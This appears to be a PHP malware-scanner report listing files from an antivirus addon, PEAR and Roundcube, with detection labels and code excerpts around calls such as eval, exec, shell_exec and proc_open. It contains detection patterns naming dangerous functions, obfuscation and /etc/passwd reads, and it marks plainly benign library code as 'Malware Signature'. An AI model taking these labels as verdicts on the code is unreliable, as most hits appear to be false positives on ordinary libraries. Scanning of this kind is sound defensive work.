//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/WorkerList.php Size: 2.19 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Cli.php Size: 8.52 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Filter.php Size: 3.69 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Cache.php Size: 4.39 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/KeyValueStorage.php Size: 7.53 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Log.php Size: 5.06 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/HTTPHelper.php Size: 7.04 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 3
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Function str_rot13 exec_str_rot13 Line: 15 Dangerous Encoded Function `exec` [https://www.php.net/exec] |
rkrP
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/autoload.php Size: 2.78 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/autoload.php Size: 3.45 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/ra_php_wrapper.php Size: 5.32 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Warns: 1
| Description | Match |
|---|
Function passthru Warning Potentially dangerous function `passthru` [https://www.php.net/passthru] |
passthru($cmd); function getStdin() { $stdin = ''; $f = @fopen('php://stdin', 'r'); while($line = fgets($f)) { $stdin .= $line; } fclose($f); return $stdin; } function getPrettyXML($xml_str) { $file_name = '/tmp/tmp_xml' . crc32(time() . rand(1, 100000)) . '.xml'; $domxml = new DOMDocument('1.0'); $domxml->preserveWhiteSpace = false; $domxml->formatOutput = true; $domxml->loadXML($xml_str); $domxml->save($file_name); $xmlp = file_get_contents($file_name); unlink($file_name); return $xmlp; } func...
|
|
//usr/share/pear/PEAR.php Size: 33.10 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$e = new Exception($this->message, $this->code);throw($e);'); } } function getMode() { return $this->mode; } function getCallback() { return $this->callback; } function getMessage() { return ($this->error_message_prefix . $this->message); } function getCode() { return $this->code; } function getType() { return get_class($this); } function getUserInfo() { return $this->userinfo; } function getDebugInfo() { return $this->getUserInfo(); } function getBacktrace($frame = null) { if (defined('PE...
|
|
//usr/share/pear/Net/LDAP2/Search.php Size: 18.69 kB Created: 2015-02-24 15:07:11 Modified: 2020-07-22 14:48:06 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("array_multisort($sort_params \$to_sort);"); } return $to_sort; } public function sorted($attrs = array('cn'), $order = SORT_ASC) { $return = array(); $sorted = $this->sorted_as_struct($attrs, $order); if (PEAR::isError($sorted)) { return $sorted; } foreach ($sorted as $key => $row) { $entry = $this->_ldap->getEntry($row['dn'], $this->searchedAttrs()); if (!PEAR::isError($entry)) { array_push($return, $entry); } else { return $entry; } } return $return; } public function as_struct() { $retu...
|
|
//usr/share/pear/PEAR/Autoloader.php Size: 6.41 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a,&$b', '$b = strtolower($b);')); $this->_autoload_map = array_merge($this->_autoload_map, $method); } else { $this->_autoload_map[strtolower($method)] = $classname; } } function removeAutoload($method) { $method = strtolower($method); $ok = isset($this->_autoload_map[$method]); unset($this->_autoload_map[$method]); return $ok; } function addAggregateObject($classname) { $classname = strtolower($classname); if (!class_exists($classname)) { $include_file = preg_replace('/[^a-z0-...
|
|
//usr/share/pear/PEAR/Builder.php Size: 16.42 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($this->config->get('php_prefix') . "php-config" . $this->config->get('php_suffix') . " --prefix"); $this->_harvestInstDir($prefix, $inst_dir . DIRECTORY_SEPARATOR . $prefix, $built_files); chdir($old_cwd); return $built_files; } function phpizeCallback($what, $data) { if ($what != 'cmdoutput') { return; } $this->log(1, rtrim($data)); if (preg_match('/You should update your .aclocal.m4/', $data)) { return; } $matches = array(); if (preg_match('/^\s+(\S[^:]+):\s+(\d{8})/', $data, $matches)) {...
|
|
//usr/share/pear/PEAR/Dependency2.php Size: 49.33 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 277 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/share/pear/PEAR/Downloader.php Size: 65.02 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a','return strtolower($a);'); array_walk($this->_installed[$key], $strtolower); } } } function discover($channel) { $this->log(1, 'Attempting to discover channel "' . $channel . '"...'); PEAR::pushErrorHandling(PEAR_ERROR_RETURN); $callback = $this->ui ? array(&$this, '_downloadCallback') : null; if (!class_exists('System')) { require_once 'System.php'; } $tmpdir = $this->config->get('temp_dir'); $tmp = System::mktemp('-d -t "' . $tmpdir . '"'); $a = $this->downloadHttp('http:/...
|
|
//usr/share/pear/PEAR/DependencyDB.php Size: 23.80 kB Created: 2020-09-30 20:16:56 Modified: 2020-12-31 15:13:13 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 478 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/share/pear/PEAR/Registry.php Size: 74.29 kB Created: 2020-09-30 20:16:56 Modified: 2020-12-31 15:13:13 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a','return !empty($a);'); } $package = is_array($package) ? array(strtolower($package[0]), strtolower($package[1])) : strtolower($package); $pkgs = array(); foreach ($path as $name => $attrs) { if (is_array($attrs)) { if (isset($attrs['install-as'])) { $name = $attrs['install-as']; } if (!in_array($attrs['role'], PEAR_Installer_Role::getInstallableRoles())) { continue; } if (!in_array($attrs['role'], PEAR_Installer_Role::getBaseinstallRoles())) { $attrs['baseinstalldir'] = is_a...
| Sign 963e968a Line: 817 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/share/pear/PEAR/RunTest.php Size: 35.38 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Warns: 5
| Description | Match |
|---|
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2], 0, -1) : $split[2]; $array = array($key => array('operator' => $split[0], 'value' => $value)); retu...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2]...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open($commandline, array( 0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w') ), $pipes); } else { $proc = proc_open($commandline, array( 0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w') ), $pipes, null, $env, array('suppress_errors' => true)); } if (!$proc) { return false; } if (is_string($stdin)) { fwrite($pipes[0], $stdin); } fclose($pipes[0]); while (true) { $r = $pipes; $e = $w = null; $n = @stream_select($r, $w, $e, 60); if ($n === 0) { $...
| Function proc_terminate Warning Potentially dangerous function `proc_terminate` [https://www.php.net/proc_terminate] |
proc_terminate($proc); return array(1234567890, $data); } else if ($n > 0) { $line = fread($pipes[1], 8192); if (strlen($line) == 0) { break; } $data .= $line; } } if (function_exists('proc_get_status')) { $stat = proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { retur...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system($cmd, $return_value); $out = ob_get_contents(); ob_end_clean(); $section_text['RETURNS'] = (int) trim($section_text['RETURNS']); $returnfail = ($return_value != $section_text['RETURNS']); } else { $returnfail = false; $stdin = isset($section_text['STDIN']) ? $section_text['STDIN'] : null; $out = $this->system_with_timeout($cmd, $env, $stdin); $return_value = $out[0]; $out = $out[1]; } $output = preg_replace('/\r\n/', "\n", trim($out)); if (isset($tmp_post) && realpath($tmp_post) && file_e...
|
|
//usr/share/pear/PEAR/Installer.php Size: 69.09 kB Created: 2020-09-30 20:16:56 Modified: 2020-12-31 15:13:13 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("\$to = $a[to];"); } else { if (!isset($options['soft'])) { $this->log(0, "invalid php-const replacement: $a[to]"); } continue; } } elseif ($a['type'] == 'pear-config') { if ($a['to'] == 'master_server') { $chan = $this->_registry->getChannel($channel); if (!PEAR::isError($chan)) { $to = $chan->getServer(); } else { $to = $this->config->get($a['to'], null, $channel); } } else { $to = $this->config->get($a['to'], null, $channel); } if (is_null($to)) { if (!isset($options['soft'])) { $this->l...
|
|
//usr/share/pear/PEAR/Command/Registry.php Size: 45.26 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a', 'return join(" = ",$a);'), $info[$key][$i]); $info[$key][$i] = implode(', ', $info[$key][$i]); } $info[$key] = implode("\n", $info[$key]); break; } default: { $info[$key] = implode(", ", $info[$key]); break; } } } if ($key == '_lastmodified') { $hdate = date('Y-m-d', $info[$key]); unset($info[$key]); $info['Last Modified'] = $hdate; } elseif ($key == '_lastversion') { $info['Previous Installed Version'] = $info[$key] ? $info[$key] : '- None -'; unset($info[$key]); } else { ...
|
|
//usr/share/pear/PEAR/PackageFile/v2.php Size: 68.07 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('&$i, $k', '$i = $i["handle"];')); $this->_stack->push(__FUNCTION__, 'error', array('handles' => $my), 'package.xml 2.0 has unmatched extra maintainers "%handles%"'); } if ($yours) { array_walk($yours, create_function('&$i, $k', '$i = $i["handle"];')); $this->_stack->push(__FUNCTION__, 'error', array('handles' => $yours), 'package.xml 1.0 has unmatched extra maintainers "%handles%"'); } } function _differentNotes($notes) { $truncnotes = strlen($notes) < 25 ? $notes : substr($note...
|
|
//usr/share/pear/PEAR/ErrorStack.php Size: 33.17 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function() code'; } else { $ret['function'] = $funcbacktrace['function']; } } } if (isset($funcbacktrace['class']) && isset($backtrace[1])) { $ret['class'] = $funcbacktrace['class']; } return $ret; } return false; } function getErrorMessage(&$stack, $err, $template = false) { if ($template) { $mainmsg = $template; } else { $mainmsg = $stack->getErrorMessageTemplate($err['code']); } $mainmsg = str_replace('%__msg%', $err['message'], $mainmsg); if (is_array($err['params']) && count($err['pa...
|
|
//usr/share/pear/pearcmd.php Size: 14.09 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 383 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/share/pear/Archive/Tar.php Size: 65.37 kB Created: 2020-09-30 20:16:55 Modified: 2020-12-31 15:13:13 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid($v_info[4]); $groupinfo = posix_getgrgid($v_info[5]); $v_uname = $userinfo['name']; $v_gname = $groupinfo['name']; } else { $v_uname = ''; $v_gname = ''; } $v_devmajor = ''; $v_devminor = ''; $v_prefix = ''; $v_binary_data_first = pack("a100a8a8a8a12a12", $v_reduce_filename, $v_perms, $v_uid, $v_gid, $v_size, $v_mtime); $v_binary_data_last = pack("a1a100a6a2a32a32a8a8a155a12", $v_typeflag, $v_linkname, $v_magic, $v_version, $v_uname, $v_gname, $v_devmajor, $v_devminor, $v_prefix, ...
|
|
//usr/share/pear/Auth/SASL/SCRAM.php Size: 12.25 kB Created: 2014-01-15 18:36:39 Modified: 2020-07-22 14:48:06 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$data', 'return hash("' . $hashes[$hash] . '", $data, TRUE);'); $this->hmac = create_function('$key,$str,$raw', 'return hash_hmac("' . $hashes[$hash] . '", $str, $key, $raw);'); } elseif ($hash == 'md5') { $this->hash = create_function('$data', 'return md5($data, true);'); $this->hmac = array($this, '_HMAC_MD5'); } elseif (in_array($hash, array('sha1', 'sha-1'))) { $this->hash = create_function('$data', 'return sha1($data, true);'); $this->hmac = array($this, '_HMAC_SHA1'); } el...
|
|
//usr/share/pear/OS/Guess.php Size: 10.70 kB Created: 2020-09-30 20:16:56 Modified: 2020-12-31 15:13:13 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 20 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
| Sign a915f4c2 Line: 20 Dangerous Malware Signature (hash: a915f4c2) |
uname -a
|
|
//usr/share/roundcubemail/program/include/rcmail_output_html.php Size: 88.23 kB Created: 2021-02-08 22:29:41 Modified: 2021-06-12 16:03:26 Warns: 2
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return ($expression);"); } protected function parse_variable($type, $name) { $value = ''; switch ($type) { case 'env': $value = $this->env[$name]; break; case 'config': $value = $this->config->get($name); if (is_array($value) && $value[$_SESSION['storage_host']]) { $value = $value[$_SESSION['storage_host']]; } break; case 'request': $value = rcube_utils::get_input_value($name, rcube_utils::INPUT_GPC); break; case 'session': $value = $_SESSION[$name]; break; case 'cookie': $value = htmlspec...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec('svn info'), $regs)) $ver .= ' [SVN r'.$regs[1].']'; } else if (is_file(RCUBE_INSTALL_PATH . '.git/index')) { if (preg_match('/Date:\s+([^\n]+)/', @shell_exec('git log -1'), $regs)) { if ($date = date('Ymd.Hi', strtotime($regs[1]))) { $ver .= ' [GIT '.$date.']'; } } } $content = html::quote($ver); } else if ($object == 'steptitle') { $content = html::quote($this->get_pagetitle(false)); } else if ($object == 'pagetitle') { $content = html::quote($this->get_pagetitle()); } else if ($obj...
|
|
//usr/share/roundcubemail/program/lib/Roundcube/rcube.php Size: 53.60 kB Created: 2021-02-08 22:29:41 Modified: 2021-06-12 16:03:26 Warns: 3
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec() { $args = func_get_args(); $cmd = array_shift($args); $values = $replacements = array(); foreach ($args as $arg) { $values += (array)$arg; } preg_match_all('/({(-?)([a-z]\w*)})/', $cmd, $matches, PREG_SET_ORDER); foreach ($matches as $tags) { list(, $tag, $option, $key) = $tags; $parts = array(); if ($option) { foreach ((array)$values["-$key"] as $key => $value) { if ($value === true || $value === false || $value === null) { $parts[] = $value ? $key : ""; } else { foreach ((array)$value a...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec($cmd); } public static function console() { $args = func_get_args(); if (class_exists('rcube', false)) { $rcube = self::get_instance(); $plugin = $rcube->plugins->exec_hook('console', array('args' => $args)); if ($plugin['abort']) { return; } $args = $plugin['args']; } $msg = array(); foreach ($args as $arg) { $msg[] = !is_string($arg) ? var_export($arg, true) : $arg; } self::write_log('console', implode(";\n", $msg)); } public static function write_log($name, $line) { if (!is_string(...
| Function syslog Warning Potentially dangerous function `syslog` [https://www.php.net/syslog] |
syslog($prio, $line); } if ($log_driver == 'stdout') { $stdout = "php://stdout"; $line = "$name: $line\n"; return file_put_contents($stdout, $line, FILE_APPEND) !== false; } $line = sprintf("[%s]: %s\n", $date, $line); if (self::$instance && self::$instance->config->get('per_user_logging') && self::$instance->get_user_id() && !in_array($name, array('userlogins', 'sendmail')) ) { $log_dir = self::$instance->get_user_log_dir(); if (empty($log_dir) && $name !== 'errors') { return false; } } if (emp...
|
|
//usr/share/roundcubemail/program/lib/Roundcube/rcube_image.php Size: 17.39 kB Created: 2021-02-08 22:29:41 Modified: 2021-06-12 16:03:26 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($convert . ' 2>&1 -flatten -auto-orient -colorspace sRGB -strip' . ' -quality {quality} -resize {size} {intype}:{in} {type}:{out}', $p); } else { try { $image = new Imagick($this->image_file); try { $image->setImageBackgroundColor('white'); $image->setImageAlphaChannel(11); $image->mergeImageLayers(Imagick::LAYERMETHOD_FLATTEN); } catch (Exception $e) { } $image->setImageColorspace(Imagick::COLORSPACE_SRGB); $image->setImageCompressionQuality(75); $image->setImageFormat($type); $image->stri...
|
|
//usr/share/roundcubemail/program/lib/Roundcube/rcube_ldap.php Size: 77.44 kB Created: 2021-02-08 22:29:41 Modified: 2021-06-12 16:03:26 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return ($code);"); } catch (ParseError $e) { } if ($res === false) { rcube::raise_error(array( 'code' => 505, 'file' => __FILE__, 'line' => __LINE__, 'message' => "Expression parse error on: ($code)"), true, false); continue; } $attrs[$lf] = $res; } else { $attrs[$lf] = preg_replace('/\{\w+\}/', '', strtr($templ, $attrvals)); } } } } private function _ldap2result($rec) { $out = array('_type' => 'person'); $fieldmap = $this->fieldmap; if ($rec['dn']) { $out[$this->primary_key] = self::dn_en...
|
|
//usr/share/roundcubemail/program/lib/Roundcube/bootstrap.php Size: 12.94 kB Created: 2021-06-03 15:35:38 Modified: 2021-06-12 16:03:26 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 41 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//usr/share/roundcubemail/program/lib/Roundcube/rcube_utils.php Size: 47.55 kB Created: 2021-02-08 22:29:41 Modified: 2021-06-12 16:03:26 Warns: 1 Dangers: 2
| Description | Match |
|---|
Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec($command)); unlink($vbscript); return $password; } $command = "/usr/bin/env bash -c 'echo OK'"; if (rtrim(shell_exec($command)) !== 'OK') { echo $prompt; $pass = trim(fgets(STDIN)); echo chr(8)."\r" . $prompt . str_repeat("*", strlen($pass))."\n"; return $pass; } $command = "/usr/bin/env bash -c 'read -s -p \"" . addslashes($prompt) . "\" mypassword && echo \$mypassword'"; $password = rtrim(shell_exec($command)); echo "\n"; return $password; } public static function get_boolean($str) ...
| Sign 11413268 Line: 509 Dangerous Malware Signature (hash: 11413268) |
exploit
| Sign 471b95ee Line: 510 Dangerous Malware Signature (hash: 471b95ee) |
securityfocus
|
|
//usr/share/roundcubemail/program/lib/Roundcube/rcube_imap_search.php Size: 7.40 kB Created: 2021-02-08 22:29:41 Modified: 2021-06-12 16:03:26 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($folders, $str, $charset = null, $sort_field = null, $threading=null) { $start = floor(microtime(true)); $results = new rcube_result_multifolder($folders); foreach ($folders as $folder) { $result = $this->results ? $this->results->get_set($folder) : false; if ($result && !$result->incomplete) { $results->add($result); } else { $search = is_array($str) && $str[$folder] ? $str[$folder] : $str; $job = new rcube_imap_search_job($folder, $search, $charset, $sort_field, $threading); $job->worker ...
|
|
//usr/share/roundcubemail/program/lib/Roundcube/spellchecker/pspell.php Size: 5.31 kB Created: 2021-02-08 22:29:41 Modified: 2021-06-12 16:03:26 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec('aspell dump dicts', $dicts); if (!empty($dicts)) { $seen = array(); foreach ($dicts as $lang) { $lang = preg_replace('/-.*$/', '', $lang); $langc = strlen($lang) == 2 ? $lang.'_'.strtoupper($lang) : $lang; if (!$seen[$langc]++) { $langs[] = $lang; } } $langs = array_unique($langs); } else { $langs = $defaults; } return $langs; } private function init() { if (!$this->plink) { if (!extension_loaded('pspell')) { $this->error = "Pspell extension not available"; return; } $this->plink = pspell_...
|
|
//usr/share/roundcubemail/plugins/markasjunk/drivers/cmd_learn.php Size: 4.18 kB Created: 2021-02-08 22:29:40 Modified: 2021-06-12 16:03:25 Warns: 1
| Description | Match |
|---|
Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec($tmp_command); if ($debug) { if ($output) { $tmp_command .= "\n$output"; } rcube::write_log('markasjunk', $tmp_command); } if (strpos($command, '%f') !== false) { unlink($tmpfname)
|
|
//usr/share/roundcubemail/plugins/password/password.php Size: 28.80 kB Created: 2021-02-08 22:29:40 Modified: 2021-06-12 16:03:26 Warns: 2
| Description | Match |
|---|
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($pipe); if (!preg_match('/^\{' . $method . '\}/', $crypted)) { return false; } if (!$prefixed) { $prefixed = (bool) $rcmail->config->get('password_dovecotpw_with_method'); } if (!$prefixed) { $crypted = trim(str_replace('{' . $method . '}', '', $crypted)); } $prefixed = false; break; case 'hash': if (!extension_loaded('hash')) { rcube::raise_error(array( 'code' => 600, 'file' => __FILE__, 'line' => __LINE__, 'message' => "Password plugin: 'hash' extension not loaded!" ), true, true); ...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open("$dovecotpw -s '$method'", $spec, $pipes); if (!is_resource($pipe)) { return false; } fwrite($pipes[0], $password . "\n", 1+strlen($password)); usleep(1000); fwrite($pipes[0], $password . "\n", 1+strlen($password)); $crypted = trim(stream_get_contents($pipes[1]), "\n"); fclose($pipes[0]); fclose($pipes[1]); proc_close($pipe); if (!preg_match('/^\{' . $method . '\}/', $crypted)) { return false; } if (!$prefixed) { $prefixed = (bool) $rcmail->config->get('password_dovecotpw_with_method')...
|
|
//usr/share/roundcubemail/plugins/password/drivers/virtualmin.php Size: 2.50 kB Created: 2021-02-08 22:29:40 Modified: 2021-06-12 16:03:26 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec("$curdir/chgvirtualminpasswd list-domains --mail-user $username --name-only", $output_domain, $returnvalue); if ($returnvalue == 0 && count($output_domain) == 1) { $domain = trim($output_domain[0]); } else { rcube::raise_error(array( 'code' => 600, 'file' => __FILE__, 'line' => __LINE__, 'message' => "Password plugin: Unable to execute $curdir/chgvirtualminpasswd or domain for mail-user '$username' not known to Virtualmin" ), true, false); return PASSWORD_ERROR; } $domain = escapeshellarg($...
|
|
//usr/share/roundcubemail/plugins/password/drivers/dbmail.php Size: 1.93 kB Created: 2021-02-08 22:29:40 Modified: 2021-06-12 16:03:25 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($command, $output, $return_value); if ($return_value == 0) { return PASSWORD_SUCCESS; } rcube::raise_error(array( 'code' => 600, 'type' => 'php', 'file' => __FILE__, 'line' => __LINE__, 'message' => "Password plugin: Unable to execute $curdir/chgdbmailusers" ), true, false)
|
|
//usr/share/roundcubemail/plugins/password/drivers/ldap_ppolicy.php Size: 3.47 kB Created: 2021-02-08 22:29:40 Modified: 2021-06-12 16:03:25 Warns: 1
| Description | Match |
|---|
Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open($cmd, $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0], $uri."\n"); fwrite($pipes[0], $baseDN."\n"); fwrite($pipes[0], $filter."\n"); fwrite($pipes[0], $bindDN."\n"); fwrite($pipes[0], $bindPW."\n"); fwrite($pipes[0], $username."\n"); fwrite($pipes[0], $currpass."\n"); fwrite($pipes[0], $newpass."\n"); fwrite($pipes[0], $cafile); fclose($pipes[0]); $result = stream_get_contents($pipes[1]); fclose($pipes[1]); $this->_debug('Policy result: ' . $result); switch ($re...
|
|
//usr/share/roundcubemail/plugins/filesystem_attachments/filesystem_attachments.php Size: 8.37 kB Created: 2021-02-08 22:29:40 Modified: 2021-06-12 16:03:25 Dangers: 2
| Description | Match |
|---|
Exploit etc_passwd Line: 19 Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system |
/etc/passwd
| Sign b236d073 Line: 19 Dangerous Malware Signature (hash: b236d073) |
/etc/passwd
|
|
//usr/share/roundcubemail/plugins/managesieve/lib/Roundcube/rcube_sieve_engine.php Size: 139.26 kB Created: 2021-02-08 22:29:40 Modified: 2021-06-12 16:03:25 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 536 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//usr/share/roundcubemail/vendor/kolab/net_ldap3/lib/Net/LDAP3.php Size: 110.41 kB Created: 2019-10-21 14:18:59 Modified: 2021-06-12 16:03:27 Warns: 2
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
